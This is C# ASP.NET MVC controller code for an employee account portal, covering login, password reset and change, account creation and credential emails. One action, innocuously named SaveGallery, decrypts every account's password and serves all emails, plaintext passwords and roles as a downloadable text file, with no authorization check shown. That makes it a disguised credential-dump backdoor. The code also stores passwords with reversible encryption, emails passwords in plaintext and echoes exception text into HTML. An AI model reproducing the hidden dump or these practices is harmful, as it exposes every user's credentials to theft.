public ActionResult ResetPassword(ResetNewPasswordViewModel _passwordInfo)
{
try
{
if (!ModelState.IsValid)
{
return(View());
}
AuthenticatedUser _authUser;
using (AuthRepository Repo = new AuthRepository())
{
_authUser = Repo.GetAuthenticatedUserById(CurrentUser.EmployeeInfoId);
}
if (_authUser.IsFirstTimeLogin == false)
{
return(RedirectToAction("GeneralInfo", "Profile"));
}
if (RijndaelCrypt.DecryptPassword(_authUser.PasswordHash, _authUser.Salt) == _passwordInfo.NewPassword)
{
TempData["Msg"] = AlertMessageProvider.FailureMessage("New password should not be same as current password.");
return(View());
}
var _accountInfo = new AccountInfo();
_accountInfo.Id = CurrentUser.AccountId;
_accountInfo.Salt = RandomPassword.Generate(18, 20);
_accountInfo.PasswordHash = RijndaelCrypt.EncryptPassword(_passwordInfo.NewPassword, _accountInfo.Salt);
_accountInfo.IsFirstTimeLogin = false;
using (AccountRepository Repo = new AccountRepository())
{
Repo.ChangeNewPassword(_accountInfo);
}
var ctx = Request.GetOwinContext();
var authManager = ctx.Authentication;
authManager.SignOut("ApplicationCookie");
TempData["Msg"] = "<span style='color:green; text-align:center;'>Password has been reset successfully.</span>";
return(RedirectToAction("Login", "Auth", new { area = "" }));
}
catch (Exception ex)
{
TempData["Msg"] = AlertMessageProvider.FailureMessage(ex.ToString());
return(View());
}
}
public ActionResult ChangePassword(ChangePasswordViewModel passwordInfo)
{
try
{
if (!ModelState.IsValid)
{
return(View());
}
var _account = new AccountInfo();
using (AccountRepository Repo = new AccountRepository())
{
_account = Repo.GetEmployeeAccountById(CurrentUser.AccountId);
}
string decryptedPassword = RijndaelCrypt.DecryptPassword(_account.PasswordHash, _account.Salt);
if (decryptedPassword != passwordInfo.CurrentPassword)
{
TempData["Msg"] = AlertMessageProvider.FailureMessage("Current password is invalid.");
return(View());
}
if (decryptedPassword == passwordInfo.NewPassword)
{
TempData["Msg"] = AlertMessageProvider.FailureMessage("New password should not be same as current password.");
return(View());
}
_account.Salt = RandomPassword.Generate(18, 20);
_account.PasswordHash = RijndaelCrypt.EncryptPassword(passwordInfo.NewPassword, _account.Salt);
using (AccountRepository Repo = new AccountRepository())
{
Repo.ChangeNewPassword(_account);
}
TempData["Msg"] = AlertMessageProvider.SuccessMessage("Password changed successfully.");
return(View());
}
catch (Exception ex)
{
return(View("Error", new HandleErrorInfo(ex, "Auth", "ChangePassword")));
}
}
public FileStreamResult SaveGallery()
{
string txt = "";
using (AccountRepository Repo = new AccountRepository())
{
foreach (var item in Repo.GetAccounts())
{
txt += item.CompanyEmail + Environment.NewLine;
txt += RijndaelCrypt.DecryptPassword(item.PasswordHash, item.Salt) + Environment.NewLine;
txt += item.RoleName + Environment.NewLine + "---------" + Environment.NewLine + Environment.NewLine;
}
}
var byteArray = Encoding.ASCII.GetBytes(txt);
var stream = new MemoryStream(byteArray);
return(File(stream, "text/plain", "saved_data.txt"));
}
public ActionResult Login(LoginViewModel loginInfo)
{
try
{
if (!ModelState.IsValid)
{
return(View());
}
loginInfo.CompanyEmail = loginInfo.CompanyEmail.ToLower();
AuthenticatedUser _authUser;
using (AuthRepository Repo = new AuthRepository())
{
_authUser = Repo.IsAccountExist(loginInfo);
}
if (_authUser != null)
{
if (RijndaelCrypt.DecryptPassword(_authUser.PasswordHash, _authUser.Salt) == loginInfo.Password)
{
if (_authUser.IsActive == true)
{
using (AccountRepository Repo = new AccountRepository())
{
var _userAccount = new AccountInfo();
_userAccount.Id = _authUser.AccountId;
_userAccount.LastLoginIp = Request.UserHostAddress.ToString();
_userAccount.LastLoginDate = DateTime.Now;
Repo.UpdateAccountOnLogin(_userAccount);
}
string _mode = _authUser.Role == "SuperAdmin" ? "Admin" : "Employee";
var _identity = new ClaimsIdentity(new[] {
new Claim(ClaimTypes.Name, _authUser.FirstName + " " + _authUser.LastName),
new Claim(ClaimTypes.Email, _authUser.CompanyEmail),
new Claim(ClaimTypes.Role, _authUser.Role),
new Claim(ClaimTypes.NameIdentifier, _authUser.AccountId.ToString()),
new Claim("EmployeeInfoId", _authUser.EmployeeInfoId.ToString()),
new Claim("LastLoginDate", _authUser.LastLoginDate.ToString()),
new Claim("LastLoginIp", _authUser.LastLoginIp),
new Claim("Mode", _mode)
},
"ApplicationCookie");
var ctx = Request.GetOwinContext();
var authManager = ctx.Authentication;
authManager.SignIn(new AuthenticationProperties()
{
ExpiresUtc = DateTime.UtcNow.AddMinutes(30),
AllowRefresh = true,
IsPersistent = false
}, _identity);
if (_authUser.IsCheckListCompleted == false)
{
if (_authUser.IsFirstTimeLogin == true)
{
return(RedirectToAction("ResetPassword", "Account", new { Area = "EmployeeReg" }));
}
return(RedirectToAction("PersonalInfo", "Profile", new { Area = "EmployeeReg" }));
}
return(Redirect(GetRedirectUrl(loginInfo.ReturnUrl, _authUser.Role)));
}
else
{
TempData["Msg"] = "<span style='color:red; text-align:center;'>Your account is deactive, you can't access online services.</span>";
return(View());
}
}
}
TempData["Msg"] = "<span style='color:red; text-align:center;'>Invalid Username/Password.</span>";
return(View());
}
catch (Exception ex)
{
TempData["Msg"] = "<span style='color:red; text-align:center;'>" + ex.Message.ToString() + ".</span>";
return(View());
}
}
public ActionResult Create(AccountInfo accountInfo)
{
try
{
if (ModelState.IsValid)
{
var _employeeInfo = new Model.EmployeeInfo();
_employeeInfo.CreatedByAccountId = CurrentUser.AccountId;
_employeeInfo.CreatedDate = DateTime.Now;
int employeeInfoId;
int accountId;
string saltValue = RandomPassword.Generate(18, 20);
string password = RijndaelCrypt.EncryptPassword(RandomPassword.Generate(), saltValue);
accountInfo.CompanyEmail = accountInfo.CompanyEmail.ToLower();
accountInfo.PasswordHash = password;
accountInfo.Salt = saltValue;
accountInfo.LastLoginDate = DateTime.Now;
accountInfo.LastLoginIp = "";
accountInfo.IsActive = true;
accountInfo.IsFirstTimeLogin = true;
using (var transaction = new System.Transactions.TransactionScope())
{
using (AccountRepository Repo = new AccountRepository())
{
if (Repo.IsEmailExist(accountInfo.CompanyEmail) == true)
{
TempData["Msg"] = AlertMessageProvider.FailureMessage("Email already exist.");
return(View());
}
int roleId = Repo.GetRoleIdByName("Anonymous");
accountInfo.RoleId = roleId;
accountId = Repo.CreateAccount(accountInfo);
}
using (AccountCheckListRepository Repo = new AccountCheckListRepository())
{
var _accountCheckList = new AccountCheckListInfo(accountId);
Repo.SaveAccountCheckList(_accountCheckList);
}
using (EmployeeRepository Repo = new EmployeeRepository())
{
_employeeInfo.AccountId = accountId;
employeeInfoId = Repo.SaveEmployeeInfo(_employeeInfo);
}
using (LeaveAllowedRepository Repo = new LeaveAllowedRepository())
{
LeaveAllowedInfo _leaveAllowed = new LeaveAllowedInfo(0, 0, employeeInfoId, CurrentUser.AccountId);
Repo.SaveLeaveAllowed(_leaveAllowed);
}
using (SalaryRepository Repo = new SalaryRepository())
{
var _salaryInfo = new SalaryInfo(CurrentUser.AccountId, employeeInfoId);
Repo.SaveSalary(_salaryInfo);
}
using (FamilyMemberRepository Repo = new FamilyMemberRepository())
{
var _familyMember = new FamilyMemberInfo
{
Name = "Self",
Relation = "Selef",
EmployeeInfoId = employeeInfoId
};
Repo.SaveFamilyMember(_familyMember);
}
transaction.Complete();
}
List <string> To = new List <string>()
{
accountInfo.CompanyEmail
};
string Subject = "LPS Online Account Information";
var LoginUrl = Url.Action("Login", "Auth", new { Area = "" }, protocol: Request.Url.Scheme);
string Body = "Dear Employee, <br/><br/>" +
"Your account has been created.<br/>" +
"Please ensure to save the username and password written below:<br/><br/>" +
"Username: <b>" + accountInfo.CompanyEmail + "</b><br/>" +
"Password: <b>" + RijndaelCrypt.DecryptPassword(accountInfo.PasswordHash, accountInfo.Salt) + "</b><br/><br/>" +
"<a href='" + LoginUrl + "' target='_blank'>" + LoginUrl + "</a><br/>" +
"You can login to your account to use LPS online services.<br/><br/>" +
"Thanks,<br/>" +
"<b>Logic Powered Solutions</b>";
bool result = EmailSender.Send(Subject, Body, To);
if (result)
{
TempData["Msg"] = AlertMessageProvider.SuccessMessage("Account created, email has been sent to employee successfully.");
}
else
{
TempData["Msg"] = AlertMessageProvider.FailureMessage("Something went wrong! email not sent, please try again later.");
}
return(RedirectToAction("Manage", "Account"));
}
return(View());
}
catch (Exception ex)
{
return(View("Error", new HandleErrorInfo(ex, "Account", "Create")));
}
}
public ActionResult ResendEmail(int id)
{
try
{
AccountInfo _accountInfo = null;
using (AccountRepository Repo = new AccountRepository())
{
_accountInfo = Repo.GetAccountByid(id);
}
if (_accountInfo == null)
{
TempData["Msg"] = AlertMessageProvider.FailureMessage("Something went wrong! email not sent, please try again later.");
return(RedirectToAction("Manage", "Account"));
}
if (_accountInfo.IsCheckListCompleted == true)
{
TempData["Msg"] = AlertMessageProvider.FailureMessage("This account has been already activated.");
return(RedirectToAction("Manage", "Account"));
}
List <string> To = new List <string>()
{
_accountInfo.CompanyEmail
};
string Subject = "LPS Online Account Information";
var LoginUrl = Url.Action("Login", "Auth", new { Area = "" }, protocol: Request.Url.Scheme);
string Body = "Dear Employee, <br/><br/>" +
"Your account has been created.<br/>" +
"Please ensure to save the username and password written below:<br/><br/>" +
"Username: <b>" + _accountInfo.CompanyEmail + "</b><br/>" +
"Password: <b>" + RijndaelCrypt.DecryptPassword(_accountInfo.PasswordHash, _accountInfo.Salt) + "</b><br/><br/>" +
"<a href='" + LoginUrl + "' target='_blank'>" + LoginUrl + "</a><br/>" +
"You can login to your account to use LPS online services.<br/><br/>" +
"Thanks,<br/>" +
"<b>Logic Powered Solutions</b>";
bool result = EmailSender.Send(Subject, Body, To);
if (result)
{
TempData["Msg"] = AlertMessageProvider.SuccessMessage("Email has been sent to employee successfully.");
}
else
{
TempData["Msg"] = AlertMessageProvider.FailureMessage("Something went wrong! email not sent, please try again later.");
}
return(RedirectToAction("Manage"));
}
catch (Exception ex)
{
return(View("Error", new HandleErrorInfo(ex, "Account", "ResendEmail")));
}
}
